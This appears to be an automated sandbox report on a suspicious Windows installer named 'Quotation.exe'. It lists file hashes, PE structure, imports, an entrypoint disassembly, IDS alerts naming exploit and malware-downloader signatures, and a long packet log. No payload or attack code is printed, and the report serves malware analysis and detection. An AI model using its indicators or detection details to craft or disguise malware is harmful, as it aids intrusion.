Preview:	degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.809660553427212
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Quotation.exe
File size:	1'182'800 bytes
MD5:	816b7984251ee4c846a7f0d6160624e2
SHA1:	be82357d711260a412103e7fde8785febd060974
SHA256:	648ee80543d70f070c497309e4c7ce090254374da938799074de93bdaafaff5a
SHA512:	81e035b9ffd16b8a31ab23f1d2bf621954cd42b8c0fdf0daffbac12f1964d41d949af68a06259e27bcc8163221cbfdb05f300eca7151ff901a2bcd36ca8b7a4c
SSDEEP:	24576:G4nhDoAFAcvHumQbl7nu5v12dUC5YpdBNFQWEZNXLGQ7WczkxFnfbP9:G+hkJcvfyl7nu5vaUCMd5iNXKQKczg
TLSH:	D945232936A5C08FEA42473C4FE7E275D93AEC143D25A11773712B8EAD72248ED9A350
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.

File Icon


Icon Hash:	873335651170390f

Static PE Info

General

Entrypoint:	0x4036da
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3f91aceea750f765ef2ba5d9988e6a00

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Bomsejlene, O=Bomsejlene, L=Cergy-Pontoise, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	30/09/2024 01:05:19 30/09/2027 01:05:19
Subject Chain	CN=Bomsejlene, O=Bomsejlene, L=Cergy-Pontoise, C=FR
Version:	3
Thumbprint MD5:	1606E780A7D9B9C90EE5DD9A8E3C27E3
Thumbprint SHA-1:	73D116799E1BAD6559DFA2AAB5E863B895F9D787
Thumbprint SHA-256:	306B7FAA9674C71EC53027C9819D39369F7D5968FA573B05221BC17B61A182BC
Serial:	5F969FE105F61264187891D561F93FFCD4C5C2C2

Entrypoint Preview

Instruction
sub esp, 000003ECh
push ebx
push ebp
push esi
push edi
xor ebx, ebx
mov edi, 00408528h
push 00008001h
mov dword ptr [esp+14h], ebx
mov ebp, ebx
call dword ptr [00408170h]
mov esi, dword ptr [004080ACh]
lea eax, dword ptr [esp+2Ch]
xorps xmm0, xmm0
mov dword ptr [esp+40h], ebx
push eax
movlpd qword ptr [esp+00000144h], xmm0
mov dword ptr [esp+30h], 0000011Ch
call esi
test eax, eax
jne 00007F795170E059h
lea eax, dword ptr [esp+2Ch]
mov dword ptr [esp+2Ch], 00000114h
push eax
call esi
push 00000053h
pop eax
mov dl, 04h
mov byte ptr [esp+00000146h], dl
cmp word ptr [esp+40h], ax
jne 00007F795170E033h
mov eax, dword ptr [esp+5Ah]
add eax, FFFFFFD0h
mov word ptr [esp+00000140h], ax
jmp 00007F795170E02Dh
xor eax, eax
jmp 00007F795170E014h
mov dl, byte ptr [esp+00000146h]
cmp dword ptr [esp+30h], 0Ah
jnc 00007F795170E02Dh
movzx eax, word ptr [esp+38h]
mov dword ptr [esp+38h], eax
jmp 00007F795170E026h
mov eax, dword ptr [esp+38h]
mov dword ptr [007A8638h], eax
movzx eax, byte ptr [esp+30h]
shl ax, 0008h
movzx ecx, ax
movzx eax, byte ptr [esp+34h]
or ecx, eax
movzx eax, byte ptr [esp+00000140h]
shl ax, 0008h
shl ecx, 10h
movzx eax, word ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a00	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3db000	0x3e910	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x11fa28	0x1228	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6c0b	0x6e00	9178309eee1a86dc5ef945d6826a6897	False	0.6605823863636363	data	6.398414552532143	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1896	0x1a00	0885e83a553c38819d1fab2908ca0cf5	False	0.4307391826923077	data	4.86610208699674	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e640	0x200	5c0f03a1a77f205400c2cbabec9976c4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x32000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3db000	0x3e910	0x3ea00	2690c3c0c1de505f961321c7e2d6da34	False	0.6915076097804391	data	6.574790239627466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3db388	0x16482	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.000394451383867
RT_ICON	0x3f1810	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.486498876138649
RT_ICON	0x402038	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5308492747529956
RT_ICON	0x40b4e0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.5497227356746766
RT_ICON	0x410968	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5415682569674067
RT_ICON	0x414b90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5884854771784233
RT_ICON	0x417138	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6179643527204502
RT_ICON	0x4181e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6668032786885246
RT_ICON	0x418b68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7287234042553191
RT_DIALOG	0x418fd0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4190d0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x4191f0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x4192b8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x419318	0x84	Targa image data - Map 32 x 25730 x 1 +1	English	United States	0.7348484848484849
RT_VERSION	0x4193a0	0x220	data	English	United States	0.5110294117647058
RT_MANIFEST	0x4195c0	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5529131985731273

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
GDI32.dll	SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
KERNEL32.dll	WriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-05T15:07:22.327002+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.7	49736	TCP
2024-11-05T15:07:50.887278+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.7	49919	TCP
2024-11-05T15:07:54.512032+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49936	172.217.18.14	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 15:07:53.134684086 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:53.134722948 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:53.134836912 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:53.199800968 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:53.199811935 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:54.061402082 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:54.061516047 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:54.062212944 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:54.062293053 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:54.138250113 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:54.138262987 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:54.138628960 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:54.138709068 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:54.143412113 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:54.187339067 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:54.512025118 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:54.514234066 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:54.514254093 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:54.514337063 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:54.514518976 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:54.514570951 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:54.514750957 CET	443	49936	172.217.18.14	192.168.2.7
Nov 5, 2024 15:07:54.514815092 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:54.514841080 CET	49936	443	192.168.2.7	172.217.18.14
Nov 5, 2024 15:07:54.556313992 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:54.556358099 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:54.556493044 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:54.556803942 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:54.556817055 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:55.420203924 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:55.420324087 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:55.491025925 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:55.491056919 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:55.492074013 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:55.494168043 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:55.494656086 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:55.535336971 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.136370897 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.136580944 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.143626928 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.143815041 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.257028103 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.257107973 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.257124901 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.257169008 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.257302046 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.257349014 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.257353067 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.257394075 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.257632017 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.257692099 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.257963896 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.258014917 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.263079882 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.263143063 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.263149023 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.263186932 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.272162914 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.272218943 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.272244930 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.272296906 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.375890970 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.375957966 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.375963926 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.375978947 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.375998974 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.376017094 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.376033068 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.376038074 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.376059055 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.376081944 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.376085997 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.376120090 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.381073952 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.381149054 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.385819912 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.385869026 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.390845060 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.390898943 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.390903950 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.390942097 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.390944958 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.390979052 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.493927002 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.494019032 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.494467974 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.494525909 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.494596958 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.494647980 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.494713068 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.494766951 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.494815111 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.494867086 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.494895935 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.494949102 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.505669117 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.505740881 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.506254911 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.506311893 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.509478092 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.509557009 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.509567976 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.509622097 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.509663105 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.509721994 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.612909079 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.612977028 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.613019943 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.613070011 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.613100052 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.613154888 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.613178968 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.613235950 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.613301039 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.613346100 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.613377094 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.613429070 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.613454103 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.613503933 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.613548994 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.613599062 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.623460054 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.623521090 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.623814106 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.623866081 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.627506971 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.627561092 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.627624989 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.627681971 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.676012039 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.676096916 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.676131010 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.676171064 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.731431961 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.731532097 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.731559992 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.731637001 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.731647968 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.731698990 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.731842041 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.731884956 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.732026100 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.732070923 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.742604017 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.742666960 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.742712021 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.742754936 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.742763996 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.742805958 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.746237993 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.746283054 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.746341944 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.746381044 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.797497034 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.797600031 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.850322962 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.850400925 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.850429058 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.850486040 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.850497007 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.850548983 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.850585938 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.850640059 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.850707054 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.850759983 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.851068974 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.851125002 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.851151943 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.851197004 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.851249933 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.851305008 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.861345053 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.861403942 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.861469030 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.861515999 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.861766100 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.861810923 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.861979961 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.862024069 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.865252972 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.865302086 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.865339994 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.865395069 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.913700104 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.913764954 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.970078945 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.970197916 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.970216990 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.970264912 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.970269918 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.970309973 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.970324993 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.970371008 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.970438004 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.970494032 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.970689058 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.970747948 CET	49947	443	192.168.2.7	142.250.184.225
